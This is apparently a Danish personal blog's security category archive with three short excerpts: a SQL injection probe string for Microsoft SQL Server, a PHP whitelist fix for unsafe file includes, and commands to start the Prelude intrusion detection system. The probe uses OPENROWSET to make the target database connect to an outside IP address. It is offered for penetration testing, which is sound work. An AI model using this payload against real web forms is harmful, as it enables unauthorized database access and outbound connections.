Kategoriarkiv: Security

Pen test, SQL Injection

Here’s the string you can drop in web form inputs to see if they’re vulnerable to SQL injection (on Microsoft SQL server anyway): ‘; select * from OPENROWSET(‘SQLOLEDB’,’192.168.0.1′;;,’select @@version’)– To verify results, replace the IP address w/ that of the … Læs resten

Udgivet i Exploits, Knowledge Base, Security | Skriv en kommentar

Secure include($_REQUEST[‘page’])

<? $allowed=explode(‘ ‘,’forside profil produkter sikkerhed service kontakt’); if (in_array($_REQUEST[‘p’],$allowed)) { include($_REQUEST[‘p’].’.inc’); } else { include($allowed[0].’.inc’); } ?> include file.inc as contained in $_REQUEST[‘p’] (query variable) if `file` are liste in the $allowed array.

Udgivet i Apache, Knowledge Base, Old Base, Security | Skriv en kommentar

How to start prelude ids

Guiden til configuration kommer en anden gang. prelude-manager -d prelude-nids -i eth0 -d

Udgivet i Intrusion detection, Knowledge Base, Networking, Old Base, Security | Skriv en kommentar